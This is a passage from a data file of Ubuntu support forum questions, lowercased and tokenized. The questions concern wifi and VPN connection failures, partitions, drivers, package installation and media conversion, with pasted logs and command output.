] password for ajay : reading package lists ... done building dependency tree reading state information ... done building data structures ... done building updates list traceback ( most recent call last ) : file `` /usr/bin/update-manager-text '' , line 70 , in < module > app = pdatemanagertext ( data_dir ) file `` /usr/lib/python3/dist-packages/updatemanagertext/updatemanagertext.py '' , line 55 , in __init__self.fillstore ( ) file `` /usr/lib/python3/dist-packages/updatemanagertext/updatemanagertext.py '' , line 90 , in fillstore self.list.pkgs , key=operator.attrgetter ( `` importance '' ) , attributeerror : 'updatelist ' object has no attribute 'pkgs'
328079	internet says it is connected but it does n't work	ok so i am totally new to the ubuntu system but my friend hooked me up with a computer and installed the software . i have no idea what 's going on . the internet says it is connected but i can not get on the internet at all . i have restarted it over and over and still nothing . i do n't see any errors and the only time it worked was when my friend tested it with ethernet . after that , nada . please help me . i do n't want to end up breaking the thing by either pressing the wrong thing or throwing it against the wall , which i am considering if i ca n't make it work . lol . not really though . but still . i 'm getting really infuriated with it . i am using wireless . sorry if i was n't clear earlier .
328085	shortcut to windows drive breaks after reboot	i 've got a dual-boot ubuntu/win7 system . windows and ubuntu each have their own hd . i like to store many files on the windows volume because it 's larger . in ubuntu , the windows volume is named 'os ' and appears as an item on my launcher . it 's path is /media/ [ name ] /os/ . i can make a shortcut to , say , /media/ [ name ] /os/users/userx/users/ and put it on my desktop in ubuntu . it works as long i do n't reboot . after i reboot , i get an error `` this link can not be used because its target â/media/userx/os/usersâ does n't exist '' . i tried adding # [ uuid ] ntfs auto 0 0 to /etc/fstab but that does n't help . i 'm not very knowledgeable when it comes to linux . what can i do ?
328086	need instructions for installing ubuntu touch	this guide from wiki seems old and confusing . for my situation : device : nexus 7 ( grouper ) origin os : android 4.3 recovery : twrp ( 3rd party recovery ) and i tried as following steps : download saucy-preinstalled-touch-armel+grouper.zip and saucy-preinstalled-touch-armhf.zip from cdimage.ubuntu webpage adb push two zip files into /sdcard adb reboot recovery select /sdcard/saucy-preinstalled-touch-armel+grouper.zip to do an update repeat step 3 , select /sdcard/saucy-preinstalled-touch-armhf.zip to do another update reboot , still android additional info shell @ grouper : / $ ls /data/ubuntu swap.swap bin boot dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var how can i install ubuntu touch ( instead of android ) on my device ?
328094	resizing ubuntu partition	installed ubuntu 12.04 on vista sp2 from external drive . output of fdisk -l at ubuntu terminal as follow : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : `` omitted '' device -- -boot -- - start -- - end -- - blocks -- - id -- - system /dev/sda1 -- - * -- - 2048 -- - 312578047 -- - 156288000 -- - 7 -- - hpfs/ntfs/exfat parted -l -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- / : ata hitachi hts54251 ( scsi ) disk /dev/sda : 160gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 160gb 160gb primary ntfs boot -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -/ now i do not see windows . can ubuntu be resized ( increased ) via gparted ?
328095	can rsync be used to copy files in a ntfs partition to another ntfs partition ?	i bought a new hard disk and wanted to copy all files in a ntfs partition to another ntfs partition . these files are pdf files and bak files used both by win7 and ubuntu . can rsync be used to sync files in a ntfs partition to another ntfs partition ? thanks
328096	no internet access via wifi , pppoe & pptp	recently i installed ubuntu 12.04 lts ; i have a problem with connecting to internet via pptp client connection . i will connect to the wireless connection of my college then pppoe connection and then pptp for internet access . i connect to wifi and pppoe successfully that that is the only way i can get access to the college website . then i connect to pptp but i lost all my internet access ( ping & browse ) ; this is my ifconfig result : ppp0 link encap : point-to-point protocol inet addr:192.168.11.37 p-t-p:192.168.11.10 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1488 metric:1 rx packets:297 errors:0 dropped:0 overruns:0 frame:0 tx packets:374 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:23812 ( 23.8 kb ) tx bytes:26959 ( 26.9 kb ) ppp1 link encap : point-to-point protocol inet addr:176.102.250.25 p-t-p:176.102.224.55 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1408 metric:1 rx packets:169 errors:0 dropped:0 overruns:0 frame:0 tx packets:173 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:10241 ( 10.2 kb ) tx bytes:10541 ( 10.5 kb ) wlan0 link encap : ethernet hwaddr 20:7c:8f:3b : f0 : ee inet addr:192.168.193.154 bcast:192.168.193.255 mask:255.255.255.0 inet6 addr : fe80 : :227c:8fff : fe3b : f0ee/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13292 errors:0 dropped:3 overruns:0 frame:0 tx packets:1243 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2158036 ( 2.1 mb ) tx bytes:160543 ( 160.5 kb ) and my route -n result : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 0.0.0.0 0.0.0.0 u 0 0 0 ppp1 0.0.0.0 0.0.0.0 0.0.0.0 u 0 0 0 ppp0 176.102.224.55 0.0.0.0 255.255.255.255 uh 0 0 0 ppp1 192.168.11.10 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 192.168.100.55 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 192.168.193.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 ppp0 is for pppoe , ppp1 for pptp and wlan0 is for my wireless my syslog shows : aug 2 12:34:17 fman-q1585m avahi-daemon [ 861 ] : joining mdns multicast group on interface wlan0.ipv4 with address 192.168.193.154 . aug 2 12:34:17 fman-q1585m avahi-daemon [ 861 ] : new relevant interface wlan0.ipv4 for mdns . aug 2 12:34:17 fman-q1585m avahi-daemon [ 861 ] : registering new address record for 192.168.193.154 on wlan0.ipv4 . aug 2 12:34:17 fman-q1585m kernel : [ 940.384157 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready aug 2 12:35:02 fman-q1585m kernel : [ 984.933056 ] wlan0 : authenticate with 00:15:6d : f8:09:6d aug 2 12:35:02 fman-q1585m kernel : [ 984.953053 ] wlan0 : send auth to 00:15:6d : f8:09:6d ( try 1/3 ) aug 2 12:35:02 fman-q1585m kernel : [ 984.956477 ] wlan0 : authenticated aug 2 12:35:02 fman-q1585m kernel : [ 984.968881 ] wlan0 : associate with 00:15:6d : f8:09:6d ( try 1/3 ) aug 2 12:35:02 fman-q1585m kernel : [ 984.977656 ] wlan0 : rx assocresp from 00:15:6d : f8:09:6d ( capab=0x421 status=0 aid=7 ) aug 2 12:35:02 fman-q1585m kernel : [ 984.978665 ] wlan0 : associated aug 2 12:35:02 fman-q1585m kernel : [ 984.978968 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready aug 2 12:35:04 fman-q1585m avahi-daemon [ 861 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :227c:8fff : fe3b : f0ee . aug 2 12:35:04 fman-q1585m avahi-daemon [ 861 ] : new relevant interface wlan0.ipv6 for mdns . aug 2 12:35:04 fman-q1585m avahi-daemon [ 861 ] : registering new address record for fe80 : :227c:8fff : fe3b : f0ee on wlan0.* . aug 2 12:35:33 fman-q1585m dhclient : dhcprequest of 192.168.193.154 on wlan0 to 255.255.255.255 port 67 aug 2 12:35:33 fman-q1585m dhclient : dhcpack of 192.168.193.154 from 192.168.189.2 aug 2 12:35:33 fman-q1585m dhclient : bound to 192.168.193.154 -- renewal in 33990 seconds . aug 2 12:36:06 fman-q1585m pppd [ 2908 ] : plugin rp-pppoe.so loaded . aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : pppd 2.4.5 started by root , uid 0 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : ppp session is 1513 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : connected to d4 : ca:6d:89:1d : fa via interface wlan0 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : using interface ppp0 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : connect : ppp0 < -- > wlan0 aug 2 12:36:06 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) aug 2 12:36:06 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : remote message : login ok aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : pap authentication succeeded aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : peer from calling number d4 : ca:6d:89:1d : fa authorized aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : replacing old default route to wlan0 [ 192.168.193.10 ] aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : local ip address 192.168.11.77 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : remote ip address 192.168.11.10 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : primary dns address 192.168.100.6 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : ccp terminated by peer ( no compression negotiated^ @ ) aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : compression disabled by peer . aug 2 12:36:26 fman-q1585m pppd [ 2948 ] : pppd 2.4.5 started by root , uid 0 aug 2 12:36:26 fman-q1585m pppd [ 2948 ] : using interface ppp1 aug 2 12:36:26 fman-q1585m pppd [ 2948 ] : connect : ppp1 < -- > /dev/pts/1 aug 2 12:36:26 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) aug 2 12:36:26 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) : no ifupdown configuration found . aug 2 12:36:26 fman-q1585m pptp [ 2950 ] : anon log [ main : pptp.c:314 ] : the synchronous pptp option is not activated aug 2 12:36:26 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' aug 2 12:36:26 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply aug 2 12:36:26 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . aug 2 12:36:27 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' aug 2 12:36:27 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . aug 2 12:36:27 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 31649 ) . aug 2 12:36:28 fman-q1585m pppd [ 2948 ] : chap authentication succeeded aug 2 12:36:28 fman-q1585m pppd [ 2948 ] : mppe 128-bit stateless compression enabled aug 2 12:36:29 fman-q1585m pppd [ 2948 ] : local ip address 176.102.250.111 aug 2 12:36:29 fman-q1585m pppd [ 2948 ] : remote ip address 176.102.224.55 aug 2 12:37:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:38:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:39:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:40:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:41:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:42:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:43:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:44:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:45:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:46:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:46:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:679 ] : no more echo reply/request packets will be reported . aug 2 13:17:01 fman-q1585m cron [ 3498 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ pptp_handle_timer : pptp_ctrl.c:1050 ] : closing control connection due to missing echo reply aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ pptp_conn_close : pptp_ctrl.c:430 ] : closing pptp connection aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 3 'stop-control-connection-request' aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : modem hangup aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : connect time 24.0 minutes . aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : sent 909838891 bytes , received 12167 bytes . aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : mppe disabled aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : connection terminated . aug 2 13:18:15 fman-q1585m avahi-daemon [ 861 ] : withdrawing workstation service for ppp1 . aug 2 13:18:15 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) aug 2 13:18:16 fman-q1585m pppd [ 3382 ] : exit .
328099	service modules-init-tools not found	while setting up lm-sensors and fanconrtol packages on ubuntu 13.04 , i arrived at a stage were i had to restart the service modules-init-tools to apply changes to the /etc/modules file then alas ! i got `` modules-init-tools : unrecognized service '' . i know a reboot of the system will most likely apply the changes . but i want to know where the service is or if it has been replaced how do i restart it from terminal without doing a reboot .
328107	speakers suddently do n't work , only headphones work	when i go to `` system settings '' then `` sound '' it does n't even recognize that there are speakers , it only shows options for headphones . the speakers/headphones worked just fine a week ago . i think maybe since doing an update it got messed up ? anyway , any ideas ?
328110	installing ubuntu with windows 8 goes dark	i 'm a little new to ubuntu . though i used ubuntu before but not too much . i 'm running windows 8 . on my desktop . its a little old actually . the cpu is pentium d with 1.5gb ram . but i do n't think that 's a problem for ubuntu 13.04 . i used ubuntu 12.04 besides win7 . but this time i 'm unable to install ubuntu . actually there is no error . i 've tried . install ubuntu , try ubuntu without installing and the installation helper . but the same thing happens each time . i can reach the boot screen ( ubuntu logo and fits under it ) and than the monitor goes offline . though the cpu fan , mouse and the keyboard is online but no response . i 've downloaded ubuntu 13.04 from the official site and burned it in a dvd . i tried burning two different dvds . considering if there is any error with that . please help me . thanks in advance .
328113	installing webcam driver on acer 5740 laptop	i am using ubuntu 13.04 64 bit on my acer 5740 ( laptop ) i3 processor . my webcam is not working . which driver is required to install so as to make my webcam work properly ?
328115	ubuntu/linux unusable lag due to graphics driver/card or monitor ?	edit : i believe the problem lies with the graphics driver , card , or my monitor itself . my problem happens even in an installed version of linux/ubuntu , not just the live cd . i 've tried getting the nvidia driver and following a plethora of guides on this site , but they all lead in me getting a black screen on bootup and having to ctrl+alt+f1 to get a terminal . if anyone has any suggestions or anything , i 'd greatly apperciate it . upon trying to install any form of linux ( tried ubuntu 13.04 , mint 15 cinnamon ) , i have a few problems : first off , i get extreme lag in both of their live cds . it starts to completely hang for minutes at a time , and then eventually the screen goes black and never displays anything again . here are my specs : asus p8p67 pro rev 3.1 motherboard ( latest bios 8/6/2013 ) intel i7 2600k processor 128gb ocz solid3 ssd ( latest fw 8/6/2013 ) 1tb seagate barracuda 7200rpm hdd nvidia geforce gtx 580 yamakasi catleap q270 ( 2560x1440 @ 60hz ) via dual-link dvi any ideas ? i ca n't even use the livecd or the os for longer than about 5-10 seconds until the hangups start . i tried getting the performance analyzer open once , and i did n't notice any weird cpu activity , but i was n't able to check out ssd/hdd activity . if this question is a duplicate and i missed it , please let me know and i will be happy to remove it . any help/answers/suggestions are very much appreciated .
328116	how do i make byobu terminal open hyperlinks in browser when clicked ?	currently i need to right click , copy url and paste link browser . i have seen this question : terminal emulator left-click to open link but it does not cover byobu 's config files ...
328117	ca n't launch springseed after update in ubuntu 13.04	i have installed springseed on ubuntu 13.04 & worked fine for me until i do n't update it , after update , i ca n't open it . when i click on it 's icon on launcher nothing happens !
328121	ubuntu 13.04 update error	when i run the command sudo apt-get update i get the following error : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/raring/release unable to find expected entry 'precise/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.canonical.com/raring/dists/precise/partner/source/sources 404 not found w : failed to fetch http : //archive.canonical.com/raring/dists/precise/partner/binary-amd64/packages 404 not found w : failed to fetch http : //archive.canonical.com/raring/dists/precise/partner/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . can someone help me to solve these errors ?
328123	how to see the amount of free disk space in files browser with 13.04 via terminal	i want to know how to see the disk space using terminal by command
328125	how to setup wireless printing from a printer connected via usb on ubuntu server 12.10 ?	today i have setup a basic home server for my family . so far , we have ftp set up , so we can backup all our files . is it possible to setup wireless printing ( printer is connected to server via usb ) ? we all have windows , except for the server of course . please help . also i 'd be great to make a noob friendly guide , i 'm not very good with linux .
328130	unable to unmount partition in virtual box	we have ubuntu 12.04.06 lts running on a virtual box . we are trying to unmount the partition as it takes a lot of space . we have extended the new partition in the virtual box from 8gb to 125gb . the new partition does not show on ubuntu . we have tried the following commands to unmount umount /dev/mapper/sqlledger-root and e2fsck -f /dev/mapper/sqlledger-root it prompts with a message that the device is busy . we have tried forcefully killing the process : sudo fuser -km /mnt/share and tried sudo umount /mnt/share we have allocated 125gb and we are not sure how we can resize the partition of ubuntu in virtual box any suggestions would be really helpful regards ,
328132	random lines with delay in between	i am using the following package to pull random lines from file ( s ) where line delimiter is % http : //manpages.ubuntu.com/manpages/lucid/man1/rl.1.html rl -c 10 -d % myfile.txt -c 10 gives 10 lines as output . how can i force it to sleep for some specified amount of time after each line it prints ?
328133	how to download ubuntu-restricted-extras after downloading it manually .tar.gz	i am new to ubuntu and started using it just a few days before with ubuntu 12.04 lts . actually , i have a slow speed dial-up internet connection . so , i downloaded the ubuntu-restricted-extras in .tar.gz format . ( do n't know from where ) . now i have to install this on my ubuntu distribution , but do n't know how . please help me in doing this . the files contend under the ubuntu-restricted-extras package are as under . natty ( folder ) install.sh ( file ) readme ( file ) please help me .
328134	creating a custom keyboard layout is n't working	i want to replace my alt keys with my control keys and then place the alt keys on the two menus keys besides the control key . the problem is that the key right of my right alt is actually the print screen button ( i have a lenovo thinkpad t430 ) so i need to adjust this from the config file i edited the symbols/us file and added severel adjustments such as adding the following : key < lalt > { [ control_l ] } ; into the english ( us ) keyboard ( which i am currently using ) . the change does not occur on my laptop . what am i doing wrong ?
328136	issues during install	after i boot onto my usb disk , ubuntu seems to start up okay , but after selecting a language , and then choosing to install 3rd party software , it seems to hang for a moment , and then goes to a terminal-like screen . the last thing that the terminal says in plain english is : world regulatory domain updated and that is followed by several lines of frequencies and bandwidth . it hangs here indefinitely .
328137	install wine 1.6 manually after downloading it	i have just downloaded wine 6.1 to install it on my ubuntu 12.04 distribution . actually , i am on a slow dial-up internet . so , i cant download its ~100 mb setup from ubuntu store . so , i downloaded it in .tar.gz ( do n't know from where ) now i have to install it , but dont know how . please help if someone have any idea . the file contened are : dlls ( folder ) documentation ( folder ) fonts ( folder ) include ( folder ) libs ( folder ) loader ( folder ) po ( folder ) programs ( folder ) server ( folder ) tools ( folder ) aclocal.m4 ( file ) announce ( file ) authors ( file ) configure ( file ) configure.ac ( file ) copying.lib ( file ) license ( file ) license.old ( file ) make.rules.in ( file ) make.vars.in ( file ) makefile.in ( file ) maketest.rules.in ( file ) readme ( file ) version ( file )
328140	how to monitor my data limit on a mobile broadband connection ?	i recently got a 3g dongle with a data plan of 200mb per month and i would like to know when i reach that limit . are there any programs ( preferably an indicator ) which let my monitor my monthly usage ? mobile partner 23 has this functionality but is not available for linux .
328141	ffmpeg - > how to keep the original audio quality during conversion ?	'-ab ' option is related to audio quality ? how to say ffmpeg to keep the original audio quality during conversion ?
328142	machine stops running randomly	i recently installed linux mint 15 64bit as a guest in a ubuntu 12.04 lts host . everything is working just fine , except that the complete machine turns off completely ( the host , physical machine ) and the screen turns black . has anyone an idea how to fix ( or even find ) the problem ? is this failing hardware or has it to do with the virtualbox-thing ? any help appreciated . if i pause the guest when cpu gets over 65째c , the machine does n't freeze anymore . my cpu is not overclocked . is there any way to allow only a specific percentage of cpu-usage ( or only a specific freq ) to prevent overheating ? is there any chance do anything in hardware without changing the cpu ? note : the built-in cpu-limiter in vbox does n't work .
328143	thunderbird showing `` unable to locate mail spool file '' on installing gmail account in ubuntu 13.04 ?	i just configure a gmail account in thunder mail but its continuously showing me error `` unable to locate mail spool file . '' when i click get mail then also it shows same error . its not retrieving mail from gmail . i tried moving /var/spool to .thunderbird but that also not working . what to do ? ?
328146	extreme privacy setting in ubuntu 13.04	ubuntu is one of the greatest os that i have ever used . however , i just wonder about the privacy because some of my activity will be sent to cannonical server . are there any ways to prevent my data from sending to cannonical server ? would you please help me to set ? i have played around with the `` privacy '' setting but some options make me confuse in `` file '' tab , if i put one folder in `` dont record activity in the following folders '' , that means my activity in this folder is not logged but how about its child folder ? is it true that my activity in the sub folder will be logged ? in `` applications '' tab , i need to list down applications that i dont want to be logged . however , i have thousand of application so how can i let the os not log any applications ? regards , nam
328148	graphic error when install ubuntu 12.04 guest on vmware player	i 'm using windows vista 32 bit , and i want to install ubuntu 12.04 by using vmware player . but after i install it , the ubuntu desktop looks like this : can someone help me please , is this a compatibility issue ? thank you . edit : i tried using virtualbox , but the i can not enter the desktop at all , i got stuck in tty , and if i pressed f7 , this screen came out :
328152	how to disable wifi power management ( rtlwifi , rtl8192cu )	i have problems using my wifi connection under ubuntu 13.04 . as many others also reported , thema realtek driver rtl8192cu causes connection problems . edit : this happens on two different machines ( ubuntu 13.04 and ubuntu 12.10 ; kernels 3.5 , 3.8 & 3.9 ) in my case it seems to disconnect every time the kernel tries to reduce the tx power : wlan1 : limiting tx power to 27 ( 27 - 0 ) dbm as advertised by ... question : is it possible to prevent the kernel/driver from doing this ? dmesg snippet i found many times in the log : [ 69.721477 ] wlan1 : authenticated [ 69.721887 ] rtl8192cu 2-2:1.0 wlan1 : disabling ht/vht due to wep/tkip use [ 69.725351 ] wlan1 : associate with 00:18:84:23:50:4a ( try 1/3 ) [ 69.744272 ] wlan1 : rx assocresp from 00:18:84:23:50:4a ( capab=0x431 status=0 aid=2 ) [ 69.744348 ] wlan1 : associated [ 69.744606 ] cfg80211 : calling crda for country : na [ 69.772495 ] wlan1 : limiting tx power to 27 ( 27 - 0 ) dbm as advertised by 00:18:84:23:50:4a [ 76.075829 ] rtlwifi : rtl_watchdog_wq_callback ( ) : < 0-0 > ap off , try to reconnect now [ 76.075859 ] wlan1 : connection to ap 00:18:84:23:50:4a lost nm-tool : ( at this time it was connected to my wifi ( becks ) and browsing the internet was not possible . ) - device : wlan1 [ becks ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8192cu state : connected default : yes hw address : ec:1a:59:10:4b:35 capabilities : speed : 18 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) easybox-ff0700 : infra , 7c:4f : b5 : ff:07:30 , freq 2422 mhz , rate 54 mb/s , strength 94 wpa wpa2 fritz ! box fon wlan 7170 : infra , 00:04:0e:89:40:21 , freq 2437 mhz , rate 54 mb/s , strength 94 wpa belkin.3948 : infra , 08:86:3b : e0:80:48 , freq 2412 mhz , rate 54 mb/s , strength 92 wpa wpa2 delidovich 's home : infra , 64:70:02 : f6 : fd:54 , freq 2452 mhz , rate 54 mb/s , strength 92 wpa2 *becks : infra , 1c : c6:3c:35 : fc:44 , freq 2417 mhz , rate 54 mb/s , strength 76 wpa asus : infra , c8:60:00:94:9a : f6 , freq 2417 mhz , rate 54 mb/s , strength 92 wpa ipv4 settings : address : 192.168.1.2 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1
328162	how to create shortcut for a command in terminal ?	i want to create a shortcut for a command in terminal . like for a command `` ssh user @ 123.45.7.123 '' , i just want a command `` user '' and the above command will run . is this possible , and if so how can it be done ? thank you !
328178	gradle in ubuntu	it appears that ubuntu does n't have new versions of gradle in their repositories for some reason . i need it for a project that will be build by launchpad . what should i do about this ?
328179	urdu text not being rendered properly	urdu text is not being displayed properly on some websites like this screenshot from facebook : this problem is independent of the browser as i 've tried firefox , chrome and chromium . i am using ubuntu 13.04 .
328182	how to install ubuntu in a particular drive ?	i have created a new partition for ubuntu in windows 7 ( l : ) . now i want to install ubuntu in that drive only . how do i do it ?
328187	items can not be installed or removed until the package is repaired . do you want to repair it now ?	i installed ubuntu-restricted-extras manually ( after downloading its compressed packed and then using command , not online ) . after installing the same , whenever i open ubuntu-software-center , a pop-up appears showing : '' items can not be installed or removed until the package catalog is repaired . do you want to repair it now ? '' it is irritating me too much as it is preventing from downloading and installing other softwares . please , tell me how can i remove or uninstall ubuntu-restricted-extras because everything was fine before it and i really dont need such extras package . please thanks ...
328193	bootloader not working	with not apperant reason when i booted my computed today i got to a grub command line screen . as far as i read it seems that the grub might been defected . i 've downloaded the ubuntu live cd and ran the boot repair program , at the end i 've got boot successfully repaired . message with a paste . after rebooting i still do n't get my boot loader and unable to get into my ubuntu installation . i have not backed up files there which i ca n't figure how to backup , could yo guys assist me getting back into my ubuntu installation or at least provide a way i could get files located under my user home folder ? thanks for any help given .
328194	unable to connect nexus 4 with 12.10	yesterday , when i 'd connected my nexus 4 on my laptop it still managed to read it and gave me the option for mtp or ptp . my laptop was able to detect the phone in ptp mode but not mtp . today , when i connected my phone again the option for mtp or ptp does n't show up on my notification area anymore . i tried following the instructions from the xda developers post but i could not continue after step # 6. . i also tried updating my gvfs file from this ask ubuntu post but still no ptp/mtp option popped from my notification area . i also always take note to unlock my phone when i connect it on my laptop but it makes no difference . help ? thank you .
328195	avconv makes audio streams too fast when copying	i am trying to assign new metadata to video file . the command looks like this : avconv -i input.avi -codec copy -map 0 \ -metadata title= '' video title '' \ -metadata artist= '' video artist '' \ -metadata genre= '' video genre '' \ -metadata copyright= '' video copyright '' \ -metadata comment= '' video comment '' \ -metadata encoder= '' video encoder '' \ output.avi program output : avconv version 0.8.6-4:0.8.6-0ubuntu0.12.04.1 , copyright ( c ) 2000-2013 the libav developers built on apr 2 2013 17:02:36 with gcc 4.6.3 input # 0 , avi , from 'input.avi ' : metadata : encoder : encoder title : title artist : artist copyright : copyright comment : comment duration : 01:40:36.19 , start : 0.000000 , bitrate : 3109 kb/s stream # 0.0 : video : mpeg4 ( advanced simple profile ) , yuv420p , 720x384 [ par 1:1 dar 15:8 ] , par 128:135 dar 16:9 , 23.98 tbr , 23.98 tbn , 23.98 tbc stream # 0.1 : audio : ac3 , 48000 hz , 5.1 , s16 , 448 kb/s stream # 0.2 : audio : ac3 , 48000 hz , 5.1 , s16 , 448 kb/s output # 0 , avi , to 'output.avi ' : metadata : icmt : video comment icop : video copyright inam : video title ignr : video genre iart : video artist isft : video encoder stream # 0.0 : video : mpeg4 , yuv420p , 720x384 [ par 128:135 dar 16:9 ] , q=2-31 , 23.98 tbn , 23.98 tbc stream # 0.1 : audio : ac3 , 48000 hz , 5.1 , 448 kb/s stream # 0.2 : audio : ac3 , 48000 hz , 5.1 , 448 kb/s stream mapping : stream # 0:0 - > # 0:0 ( copy ) stream # 0:1 - > # 0:1 ( copy ) stream # 0:2 - > # 0:2 ( copy ) ... video:1617716kb audio:660037kb global headers:0kb muxing overhead 0.535363 % the problem with output video file its audio tracks are played 4 times as fast . how can i perform the desired action keeping video file in sane state ?
328205	login as root user with full privilages	i dont like to enter password for every software to install or other thing like it.i look for a way that can login with root user as default when ubuntu started . in fact i want login with a user that have full permission .
328212	install ubuntu over slackware	i want to install ubuntu on a dual boot windows xp machine which already has ext2 space and swap allocated for slackware , i want to install ubuntu in the area now used by slackware . when i go into 'something else ' and select slackware section and press 'install now ' it comes back with 'no root filesystem defined '
